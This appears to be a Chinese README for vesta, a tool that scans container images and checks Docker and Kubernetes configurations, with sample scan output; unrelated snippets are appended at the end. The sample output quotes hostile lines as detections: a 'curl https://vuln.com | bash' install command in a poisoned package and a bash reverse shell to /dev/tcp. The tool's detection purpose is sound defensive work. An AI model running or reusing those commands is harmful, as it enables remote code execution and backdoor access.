软件概览
vesta 是一款集容器扫描,Docker和Kubernetes配置基线检查于一身的工具。检查内容包括镜像或容器中包含漏洞版本的组件,Docker以及Kubernetes的危险配置。vesta同时也是一个灵活,方便的工具,能够在各种系统上运行,机器内1 vCPU, 2G Memory即可,包括但不限于Windows,Linux以及MacOS
检查项
Scan
- 扫描通过主流安装方法安装程序的漏洞
- apt/apt-get
- rpm
- yum
- dpkg
- 扫描软件依赖的漏洞以及恶意投毒的依赖包
- Java(Jar, War, 以及主流依赖log4j)
- NodeJs(NPM, YARN)
- Python(Wheel, Poetry)
- Golang(Go binary)
- PHP(Composer, 以及主流的PHP框架: laravel, thinkphp, wordpress, wordpress插件等)
- Rust(Rust binary)
Docker检查
| Supported | Check Item | Description | Severity | Reference |
|---|---|---|---|---|
| ✔ | PrivilegeAllowed | 危险的特权模式 | critical | Ref |
| ✔ | Capabilities | 危险capabilities被设置 | critical | Ref |
| ✔ | Volume Mount | 敏感或危险目录被挂载 | critical | Ref |
| ✔ | Docker Unauthorized | 2375端口打开并且未授权 | critical | Ref |
| ✔ | Kernel version | 当前内核版本存在逃逸漏洞 | critical | Ref |
| ✔ | Network Module | Net模式为host模式或同时在特定containerd版本下 |
critical/medium | |
| ✔ | Pid Module | Pid模式被设置为host |
high | |
| ✔ | Docker Server version | Docker Server版本存在漏洞 | critical/high/medium/low | |
| ✔ | Docker env password check | Docker env是否存在弱密码 | high/medium | |
| ✔ | Image tag check | Image没有被打tag或为默认latest | low | |
| ✔ | Docker history | Docker layers 存在不安全的命令 | high/medium | |
| ✔ | Docker Backdoor | Docker env command 存在恶意命令 | critical/high |
Kubernetes检查
| Supported | Check Item | Description | Severity | Reference |
|---|---|---|---|---|
| ✔ | PrivilegeAllowed | 危险的特权模式 | critical | Ref |
| ✔ | Capabilities | 危险capabilities被设置 | critical | Ref |
| ✔ | PV and PVC | PV 被挂载到敏感目录并且状态为active | critical/medium | Ref |
| ✔ | RBAC | K8s 权限存在危险配置 | high/medium/ low/warning | |
| ✔ | Kubernetes-dashborad | 检查 -enable-skip-login以及 dashborad的账户权限 |
critical/high/ low | Ref |
| ✔ | Kernel version | 当前内核版本存在逃逸漏洞 | critical | Ref |
| ✔ | Docker Server version (k8s versions is less than v1.24) | Docker Server版本存在漏洞 | critical/high/ medium/low | |
| ✔ | Kubernetes certification expiration | 证书到期时间小于30天 | medium | |
| ✔ | ConfigMap and Secret check | ConfigMap 或者 Secret是否存在弱密码 | high/medium | |
| ✔ | PodSecurityPolicy check (k8s version under the v1.25) | PodSecurityPolicy过度容忍Pod不安全配置 | high/medium/low | Ref |
| ✔ | Auto Mount ServiceAccount Token | Pod默认挂载了service token | critical/high/ medium/low | Ref |
| ✔ | NoResourceLimits | 没有限制资源的使用,例如CPU,Memory, 存储 | low | Ref |
| ✔ | Job and Cronjob | Job或CronJob没有设置seccomp或seLinux安全策略 | low | Ref |
| ✔ | Envoy admin | Envoy admin被配置以及监听0.0.0.0. |
high/medium | Ref |
| ✔ | Cilium version | Cilium 存在漏洞版本 | critical/high/ medium/low | Ref |
| ✔ | Istio configurations | Istio 存在漏洞版本以及安全配置检查 | critical/high/ medium/low | Ref |
| ✔ | Kubelet 10255 and Kubectl proxy | 10255 port 打开或 Kubectl proxy开启 | high/medium/ low | |
| ✔ | Etcd configuration | Etcd 安全配置检查 | high/medium | |
| ✔ | Sidecar configurations | Sidecar 安全配置检查以及Env环境检查 | critical/high/ medium/low | |
| ✔ | Pod annotation | Pod annotation 存在不安全配置 | high/medium/ low/warning | Ref |
| ✔ | DaemonSet | DaemonSet存在不安全配置 | critical/high/ medium/low | |
| ✔ | Backdoor | 检查k8s中是否有后门 | critical/high | Ref |
| ✔ | Lateral admin movement | Pod被特意配置到Master节点中 | medium/low |
编译并使用vesta
- 编译vesta
- 使用
make build进行编译 - 从Releases上下载可执行文件
- 使用vesta检查镜像过容器中的漏洞组件版本(使用镜像ID,镜像标签或使用
-f文件输入均可)
$./vesta scan container -f example.tar 2022/11/29 22:50:19 Begin upgrading vulnerability database 2022/11/29 22:50:19 Vulnerability Database is already initialized 2022/11/29 22:50:19 Begin to analyze the layer 2022/11/29 22:50:35 Begin to scan the layer Detected 216 vulnerabilities +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. If | | | | | | | | django.utils.text.Truncator's | | | | | | | | chars() and words() methods | | | | | | | | were passed the html=True | | | | | | | | argument, t ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. | | | | | | | | Due to the behaviour of | | | | | | | | the underlying HTMLParser, | | | | | | | | django.utils.html.strip_tags | | | | | | | | would be extremely ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in | | | | | | | | Django 1.11.x before 1.11.23, | | | | | | | | 2.1.x before 2.1.11, and 2.2.x | | | | | | | | before 2.2.4. Due to an error | | | | | | | | in shallow key transformation, | | | | | | | | key and index lookups for | | | | | | | | django.contrib.postgres.f ... | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in | | | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', | | | | | | | | malicious command "curl https://vuln.com | bash" are | | | | | | | | detected. | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
- 使用vesta检查Docker的基线配置
也可以在docker中使用
make run.docker
$./vesta analyze docker 2022/11/29 23:06:32 Start analysing Detected 3 vulnerabilities +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | ID | CONTAINER DETAIL | PARAM | VALUE | SEVERITY | DESCRIPTION | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | 1 | Name: Kernel | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering | | | ID: None | | | | the CVE-2022-0492 with | | | | | | | CAP_SYS_ADMIN and v1 | | | | | | | architecture of cgroups | | | | | | | vulnerablility, has a | | | | | | | potential container escape. | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | 2 | Name: vesta_vuln_test | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering | | | ID: 207cf8842b15 | | | | the Dirty Pipe vulnerablility, | | | | | | | has a potential container | | | | | | | escape. | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | 3 | Name: Image Tag | Privileged | true | critical | There has a potential container| | | ID: None | | | | escape in privileged module. | | | | | | | | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+ | 4 | Name: Image Configuration | Image History | Image name: | high | Weak password found | | | ID: None | | vesta_history_test:latest | | | in command: ' echo | | | | | Image ID: 4bc05e1e3881 | | 'password=test123456' > | | | | | | | config.ini # buildkit'. | +----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
- 使用vesta检查Kubernetes的基线配置
2022/11/29 23:15:59 Start analysing 2022/11/29 23:15:59 Geting docker server version 2022/11/29 23:15:59 Geting kernel version Detected 4 vulnerabilities Pods: +----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | ID | POD DETAIL | PARAM | VALUE | TYPE | SEVERITY | DESCRIPTION | +----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | 1 | Name: vulntest | Namespace: | sidecar name: vulntest | | true | Pod | critical | There has a potential | | | default | Status: Running | | Privileged | | | | container escape in privileged | | | Node Name: docker-desktop | | | | | module. | + + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | | | sidecar name: vulntest | | Token:Password123456 | Sidecar EnvFrom | high | Sidecar envFrom ConfigMap has | | | | env | | | | found weak password: | | | | | | | | 'Password123456'. | + + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | | | sidecar name: sidecartest | | MALWARE: bash -i >& | Sidecar Env | high | Container 'sidecartest' finds | | | | env | /dev/tcp/10.0.0.1/8080 0>&1 | | | high risk content(score: | | | | | | | | 0.91 out of 1.0), which is a | | | | | | | | suspect command backdoor. | +----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | 2 | Name: vulntest2 | Namespace: | sidecar name: vulntest2 | | CAP_SYS_ADMIN | capabilities.add | critical | There has a potential | | | default | Status: Running | | capabilities | | | | container escape in privileged | | | Node Name: docker-desktop | | | | | module. | + + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | | | sidecar name: vulntest2 | | true | kube-api-access-lcvh8 | critical | Mount service account | | | | automountServiceAccountToken | | | | and key permission are | | | | | | | | given, which will cause a | | | | | | | | potential container escape. | | | | | | | | Reference clsuterRolebind: | | | | | | | | vuln-clusterrolebinding | | | | | | | | | roleBinding: vuln-rolebinding | + + +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ | | | sidecar name: vulntest2 | | cpu | Pod | low | CPU usage is not limited. | | | | Resource | | | | | | | | | | | | | +----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+ Configures: +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | ID | TYPEL | PARAM | VALUE | SEVERITY | DESCRIPTION | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 1 | K8s version less than v1.24 | kernel version | 5.10.104-linuxkit | critical | Kernel version is suffering | | | | | | | the CVE-2022-0185 with | | | | | | | CAP_SYS_ADMIN vulnerablility, | | | | | | | has a potential container | | | | | | | escape. | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 2 | ConfigMap | ConfigMap Name: vulnconfig | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high | ConfigMap has found weak | | | | Namespace: default | | | password: 'Password123'. | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 3 | Secret | Secret Name: vulnsecret-auth | password:Password123 | high | Secret has found weak | | | | Namespace: default | | | password: 'Password123'. | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 4 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | high | Key permissions with key | | | | vuln-clusterrolebinding | | create, update | resources: | | resources given to the | | | | rolename: vuln-clusterrole | | pods, services | | default service account, which | | | | kind: ClusterRole | subject | | | will cause a potential data | | | | kind: Group | subject name: | | | leakage. | | | | system:serviceaccounts:vuln | | | | | | | | namespace: vuln | | | | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 5 | RoleBinding | binding name: vuln-rolebinding | verbs: get, watch, list, | high | Key permissions with key | | | | | rolename: vuln-role | role | create, update | resources: | | resources given to the | | | | kind: Role | subject kind: | pods, services | | default service account, which | | | | ServiceAccount | subject name: | | | will cause a potential data | | | | default | namespace: default | | | leakage. | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+ | 6 | ClusterRoleBinding | binding name: | verbs: get, watch, list, | warning | Key permission are given | | | | vuln-clusterrolebinding2 | | create, update | resources: | | to unknown user 'testUser', | | | | rolename: vuln-clusterrole | | pods, services | | printing it for checking. | | | | subject kind: User | subject | | | | | | | name: testUser | namespace: | | | | | | | all | | | | +----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
使用方法
$./vesta -h
Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit
Tutorial is available at https://github.com/kvesta/vesta
Usage:
vesta [command]
Available Commands:
analyze Kubernetes analyze
completion Generate the autocompletion script for the specified shell
help Help about any command
scan Container scan
update Update vulnerability database
version Print version information and quit
Flags:
-h, --help help for vesta
相关资料
-
通过系统内置规则,将匹配规则的安全性较低的资源扫描出来并按照建议进行处理,从而提高系统安全性的目的。 建议列表 建议列表显示所有匹配优化建议规则的资源列表,用户可根据建议对资源进行处理。 忽略列表 忽略列表显示不需要处理的资源或一类规则建议。 规则配置 规则配置即根据系统内影响资源安全的条件设置相应的规则,如安全组的规则设置等,当资源匹配规则则表示资源的安全性较低,需要用户进行处理等。
-
2024年4月3日 | 10点 | 一面 | 40 min 左右 1. 自我介绍 2. 你熟悉Python多一点吗?还熟悉其它语言吗,拿出来写过的? 3. 你是软件工程专业,为啥JAVA用的不多呢,没写过对应项目? 4. 运维是自己学到吗? 5. 运维通过什么样子方式学习? 6. 我们坦诚的说,去参加过培训班吗? 7. OpenStack是你自己搭建的吗? 8. OpenStack有几个关键组件?
-
之前各讲中,分别讲解了安卓的开发环境、架构和基本概念。从这一讲开始,我将制作一个简单的应用,并通过逐步升级它的功能,连带出安卓开发的多个情境。 《维纳斯的诞生》是文艺复兴早期名画。相传美神维纳斯从海的泡沫中诞生,波提切利用大胆的笔触描绘这一古典神话。画面洋溢着对人体和美的热爱。如果在中世纪或者西班牙宗教审判时期,这幅画足够波提切利上火刑架了。 任务描述 我将制作一个简单的欢迎页面。页面中有一个按钮
-
当我的程序在一些迭代之间启动时,我会得到输出标志值,这意味着引用检查在同一引用上失败。但经过一些迭代后,输出变为常量值,然后长时间执行程序,不会生成一个输出。 如输出所示,经过n次(不固定)迭代后,输出似乎是一个常数值,不会改变。 输出: 对于某些迭代:
-
flutter似乎在空安全检查和非空安全检查之间切换,导致了几十个问题。 空错误检查返回???
-
Apache Commons Collections库的CollectionUtils类为常见操作提供了各种实用方法,涵盖了广泛的用例。 它有助于避免编写样板代码。 这个库在jdk 8之前非常有用,因为Java 8的Stream API现在提供了类似的功能。 检查非空列表 CollectionUtils的isNotEmpty()方法可用于检查列表是否为空而不必担心空列表。 因此,在检查列表大小之前